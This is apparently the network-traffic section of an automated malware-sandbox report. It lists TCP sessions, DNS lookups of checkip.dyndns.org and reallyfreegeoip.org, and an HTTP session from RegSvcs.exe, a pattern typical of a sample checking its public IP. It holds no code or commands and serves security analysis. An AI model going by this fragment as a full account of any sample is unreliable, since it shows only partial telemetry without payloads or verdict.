Jan 2, 2025 20:23:57.796291113 CET	443	49738	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.934283018 CET	443	49738	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.934350014 CET	443	49738	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.934633970 CET	49738	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.935066938 CET	49738	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.985459089 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.987303972 CET	49740	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.990596056 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:57.990654945 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.992208958 CET	80	49740	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:57.992273092 CET	49740	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.992367029 CET	49740	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.997114897 CET	80	49740	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:58.685033083 CET	80	49740	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:58.690136909 CET	49742	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:58.690195084 CET	443	49742	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:58.690283060 CET	49742	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:58.694117069 CET	49742	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:58.694130898 CET	443	49742	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:58.733918905 CET	49740	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:59.168008089 CET	443	49742	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:59.171863079 CET	49742	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:59.171894073 CET	443	49742	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:59.306963921 CET	443	49742	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:59.307029009 CET	443	49742	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:59.307076931 CET	49742	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:59.307498932 CET	49742	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:59.313333035 CET	49740	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:59.314784050 CET	49743	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:59.318344116 CET	80	49740	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:59.318412066 CET	49740	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:59.319571972 CET	80	49743	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:59.319648027 CET	49743	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:59.319762945 CET	49743	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:59.324515104 CET	80	49743	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:59.993010044 CET	80	49743	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:59.994116068 CET	49744	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:59.994165897 CET	443	49744	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:59.994225979 CET	49744	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:59.994498014 CET	49744	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:59.994508982 CET	443	49744	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:00.123734951 CET	49743	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.163713932 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.168616056 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:00.168688059 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.168922901 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.173710108 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:00.449348927 CET	443	49744	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:00.451273918 CET	49744	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:00.451296091 CET	443	49744	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:00.599603891 CET	443	49744	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:00.599682093 CET	443	49744	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:00.599788904 CET	49744	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:00.604038000 CET	49744	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:00.608035088 CET	49746	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.612920046 CET	80	49746	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:00.613003969 CET	49746	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.613106012 CET	49746	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.617964029 CET	80	49746	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:00.842230082 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:00.846836090 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:00.851742029 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:01.076775074 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:01.117728949 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.117767096 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.117835045 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.121587038 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.121601105 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.123755932 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.318676949 CET	80	49746	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:01.319848061 CET	49748	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.319905043 CET	443	49748	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.319963932 CET	49748	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.320271015 CET	49748	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.320282936 CET	443	49748	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.373739958 CET	49746	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.585083008 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.585159063 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.586658001 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.586673021 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.586955070 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.639393091 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.691129923 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.735327005 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.786744118 CET	443	49748	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.788398981 CET	49748	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.788424969 CET	443	49748	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.820101023 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.820174932 CET	443	49747	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.820211887 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.824354887 CET	49747	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.829404116 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.834255934 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:01.934612989 CET	443	49748	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.934714079 CET	443	49748	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:01.934772968 CET	49748	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.935201883 CET	49748	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:01.938994884 CET	49746	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.939932108 CET	49749	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.943955898 CET	80	49746	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:01.944137096 CET	49746	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.944730043 CET	80	49749	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:01.944802046 CET	49749	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.944890976 CET	49749	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:01.949604034 CET	80	49749	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:02.045994043 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:02.048194885 CET	49750	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.048235893 CET	443	49750	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.048302889 CET	49750	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.048626900 CET	49750	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.048635006 CET	443	49750	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.092488050 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:02.504700899 CET	443	49750	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.506567001 CET	49750	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.506609917 CET	443	49750	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.628397942 CET	80	49749	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:02.629658937 CET	49751	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.629724979 CET	443	49751	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.629800081 CET	49751	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.630040884 CET	49751	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.630058050 CET	443	49751	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.644963026 CET	443	49750	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.645040989 CET	443	49750	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:02.645087004 CET	49750	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.645529032 CET	49750	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:02.648850918 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:02.649868965 CET	49752	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:02.653842926 CET	80	49745	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:02.653896093 CET	49745	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:02.654642105 CET	80	49752	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:02.654706001 CET	49752	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:02.654784918 CET	49752	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:02.659503937 CET	80	49752	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:02.670615911 CET	49749	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.083842993 CET	443	49751	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.085536003 CET	49751	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.085567951 CET	443	49751	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.223115921 CET	443	49751	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.223196983 CET	443	49751	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.223251104 CET	49751	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.223939896 CET	49751	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.228121042 CET	49749	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.228717089 CET	49753	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.233092070 CET	80	49749	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:03.233163118 CET	49749	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.233566999 CET	80	49753	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:03.233622074 CET	49753	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.233732939 CET	49753	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.238406897 CET	80	49753	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:03.354253054 CET	80	49752	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:03.362494946 CET	49754	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.362545013 CET	443	49754	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.362610102 CET	49754	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.362844944 CET	49754	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.362858057 CET	443	49754	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.405028105 CET	49752	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.837218046 CET	443	49754	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.838757992 CET	49754	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.838784933 CET	443	49754	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.920108080 CET	80	49753	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:03.921467066 CET	49755	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.921510935 CET	443	49755	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.921911955 CET	49755	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.922158003 CET	49755	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.922168970 CET	443	49755	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.967511892 CET	49753	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:03.991061926 CET	443	49754	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.991133928 CET	443	49754	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:03.991251945 CET	49754	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.991573095 CET	49754	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:03.995553970 CET	49756	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.000720024 CET	80	49756	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:04.000792980 CET	49756	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.000997066 CET	49756	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.005776882 CET	80	49756	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:04.406352043 CET	443	49755	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:04.408776999 CET	49755	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:04.408809900 CET	443	49755	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:04.565144062 CET	443	49755	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:04.565224886 CET	443	49755	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:04.565268040 CET	49755	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:04.565753937 CET	49755	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:04.569685936 CET	49753	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.570357084 CET	49757	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.574588060 CET	80	49753	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:04.574641943 CET	49753	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.575185061 CET	80	49757	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:04.575346947 CET	49757	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.575346947 CET	49757	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:04.580074072 CET	80	49757	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:04.723802090 CET	80	49756	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:04.730619907 CET	49758	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:04.730674982 CET	443	49758	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:04.730751038 CET	49758	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:04.731019020 CET	49758	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:04.731029987 CET	443	49758	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:04.764369011 CET	49756	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.191272974 CET	443	49758	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.193188906 CET	49758	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.193231106 CET	443	49758	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.276160002 CET	80	49757	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:05.277470112 CET	49759	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.277523041 CET	443	49759	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.277625084 CET	49759	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.277913094 CET	49759	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.277925968 CET	443	49759	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.327061892 CET	49757	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.350460052 CET	443	49758	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.350523949 CET	443	49758	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.350646973 CET	49758	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.351269960 CET	49758	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.355590105 CET	49756	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.356415987 CET	49760	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.360595942 CET	80	49756	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:05.361227989 CET	80	49760	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:05.361325026 CET	49756	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.361385107 CET	49760	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.361500978 CET	49760	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:05.366302967 CET	80	49760	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:05.762974024 CET	443	49759	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.766217947 CET	49759	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.766247034 CET	443	49759	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.894889116 CET	443	49759	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.894962072 CET	443	49759	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:05.895286083 CET	49759	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:05.895601034 CET	49759	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.047043085 CET	49743	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.047218084 CET	49757	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.092055082 CET	80	49760	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:06.129970074 CET	49761	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.130014896 CET	443	49761	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:06.130072117 CET	49761	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.139384985 CET	49760	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.150357962 CET	49761	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.150373936 CET	443	49761	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:06.609105110 CET	443	49761	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:06.610965014 CET	49761	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.610994101 CET	443	49761	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:06.760628939 CET	443	49761	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:06.760699034 CET	443	49761	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:06.760756016 CET	49761	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.761169910 CET	49761	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:06.764060974 CET	49760	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.765467882 CET	49762	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.769316912 CET	80	49760	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:06.769381046 CET	49760	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.770292997 CET	80	49762	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:06.770365000 CET	49762	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.770608902 CET	49762	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:06.775398016 CET	80	49762	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:07.470913887 CET	80	49762	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:07.479717970 CET	49763	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:07.479757071 CET	443	49763	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:07.480088949 CET	49763	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:07.480361938 CET	49763	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:07.480371952 CET	443	49763	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:07.514381886 CET	49762	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:07.938388109 CET	443	49763	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:07.939825058 CET	49763	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:07.939852953 CET	443	49763	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:08.090213060 CET	443	49763	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:08.090295076 CET	443	49763	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:08.090356112 CET	49763	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:08.090873003 CET	49763	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:08.094161987 CET	49762	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:08.095407009 CET	49764	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:08.099252939 CET	80	49762	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:08.099332094 CET	49762	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:08.100241899 CET	80	49764	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:08.100353003 CET	49764	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:08.100476980 CET	49764	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:08.105287075 CET	80	49764	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:08.774764061 CET	80	49764	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:08.776422024 CET	49766	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:08.776474953 CET	443	49766	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:08.776901960 CET	49766	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:08.777204990 CET	49766	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:08.777215004 CET	443	49766	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:08.826899052 CET	49764	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:09.260453939 CET	443	49766	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:09.262753963 CET	49766	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:09.262784958 CET	443	49766	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:09.428491116 CET	443	49766	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:09.429207087 CET	443	49766	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:09.429445982 CET	49766	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:09.429749966 CET	49766	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:09.432976007 CET	49764	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:09.434338093 CET	49767	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:09.438000917 CET	80	49764	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:09.438102961 CET	49764	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:09.439254045 CET	80	49767	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:09.439354897 CET	49767	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:09.439560890 CET	49767	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:09.444351912 CET	80	49767	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:10.156790972 CET	80	49767	132.226.247.73	192.168.2.4
Jan 2, 2025 20:24:10.158159018 CET	49770	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:10.158209085 CET	443	49770	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:10.158276081 CET	49770	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:10.158529997 CET	49770	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:10.158541918 CET	443	49770	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:10.201906919 CET	49767	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:10.641211033 CET	443	49770	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:10.652026892 CET	49770	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:10.652066946 CET	443	49770	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:10.796536922 CET	443	49770	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:10.796607971 CET	443	49770	188.114.96.3	192.168.2.4
Jan 2, 2025 20:24:10.796768904 CET	49770	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:10.797194958 CET	49770	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:24:10.990103006 CET	49767	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:24:10.990155935 CET	49752	80	192.168.2.4	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:23:55.257010937 CET	50866	53	192.168.2.4	1.1.1.1
Jan 2, 2025 20:23:55.263784885 CET	53	50866	1.1.1.1	192.168.2.4
Jan 2, 2025 20:23:56.249643087 CET	60695	53	192.168.2.4	1.1.1.1
Jan 2, 2025 20:23:56.256975889 CET	53	60695	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 20:23:55.257010937 CET	192.168.2.4	1.1.1.1	0xfd63	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:56.249643087 CET	192.168.2.4	1.1.1.1	0x69a	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 20:23:55.263784885 CET	1.1.1.1	192.168.2.4	0xfd63	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 20:23:55.263784885 CET	1.1.1.1	192.168.2.4	0xfd63	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:55.263784885 CET	1.1.1.1	192.168.2.4	0xfd63	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:55.263784885 CET	1.1.1.1	192.168.2.4	0xfd63	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:55.263784885 CET	1.1.1.1	192.168.2.4	0xfd63	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:55.263784885 CET	1.1.1.1	192.168.2.4	0xfd63	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:56.256975889 CET	1.1.1.1	192.168.2.4	0x69a	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:23:56.256975889 CET	1.1.1.1	192.168.2.4	0x69a	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	132.226.247.73	80	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

